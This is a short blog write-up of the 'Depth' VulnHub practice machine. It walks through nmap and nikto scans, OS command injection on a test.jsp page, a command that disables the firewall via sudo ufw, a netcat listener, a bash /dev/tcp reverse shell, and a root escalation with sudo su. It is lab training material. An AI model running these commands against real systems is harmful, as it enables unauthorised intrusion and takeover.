Depth Vulnhub Writeup

3 min readAug 21, 2022


Depth vulhub writeup

Hi guys, Warm welcome to my blog. Today we going to discuss about depth vulnhub machine and is a very easiest machine that is coming up with OS command injection vulnerability on the debugging page and its running on the java server

To escalate the root privilege we want to abuse the sudo binary.

So first fire up your machine in your virtual box

Download the machine:,213/

As usual we startup with a nmap scan

STEP 1: nmap -sC -sV

Depth vulhub writeup nmap

Further analyzing this nmap result I have found some interesting services and ports which is SSH in 22 and HTTP in 8080 etc.

So let us visit that web page which is

Here I have checked all links but nothing should be interesting.

So further I enumerated using the nikto tool

STEP 2: nikto -h

Depth vulnub writeup apache

After analyzing this report I have found one interesting file which is test.jsp

So let's check it this

Further analyzing this web page I found that this page is affected by os command injection vulnerability which we can able to run the system command.

So first I tried

STEP 3: ls -l /tmp

Now it will list the file from the tmp folder

So next I tried for home directory

STEP 4: ls -l /home

Now you get the username of that system which is bill

So next I disabled the firewall of that machine

STEP 5: ssh bill@localhost sudo ufw disable

Next, we going to write the reverse shell

Before that setup your listener

STEP 6: nc -lvp 4242

STEP 7: ssh bill@localhost sudo bash -i >& /dev/tcp/ 0>&1


Now you get the user shell of that machine

To escalate the root privilege we go for sudo binary abuse

STEP 8: sudo -l

STEP 9: sudo su


Now you will get the root shell

STEP 10: cd root

STEP 11: cat flag

I hope you will understand this article if you like this please donate to us

OSCP student:




Written by Vignesh

Hi, I'm Vignesh just call me Vicky. I'm a cybersecurity Researcher who was more interested in this cybersecurity field basically I'm a Offsec Student.

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